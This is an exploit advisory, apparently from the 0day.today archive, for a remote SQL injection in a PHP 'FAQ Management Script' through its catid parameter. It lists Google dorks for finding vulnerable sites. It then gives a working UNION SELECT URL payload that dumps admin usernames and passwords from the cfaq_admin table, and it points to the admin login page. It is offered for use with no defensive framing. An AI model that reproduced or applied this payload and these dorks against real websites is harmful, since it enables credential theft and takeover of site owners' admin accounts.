id: 3804
date: 09/29/2008
title: FAQ Management Script (catid) Remote SQL Injection Vulnerability
author: Hussin X
cves: 

================================================================
FAQ Management Script (catid) Remote SQL Injection Vulnerability
================================================================


|___________________________________________________|
|
| FAQ Management (catid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|--------------------    Hussin X  -------------------|
|
|    Author: Hussin X
|___________________________________________________
|                                                   |
|
| script : http://www.quidascript.com/index.php?main_page=product_info&cPath=1_15&products_id=80
|
| DorK   : inurl:cfaq/index.php?catid=
|
| DorK   : inurl:index.php?catid=
|___________________________________________________|






Exploit: 

www.[target].com/Script/index.php?catid=-1+union+select+concat(username,0x3a,password),2+FROM+cfaq_admin--


AdmiN LoGiN :

www.[target].com/Script//admin.php



#  0day.today [2023-03-24]  #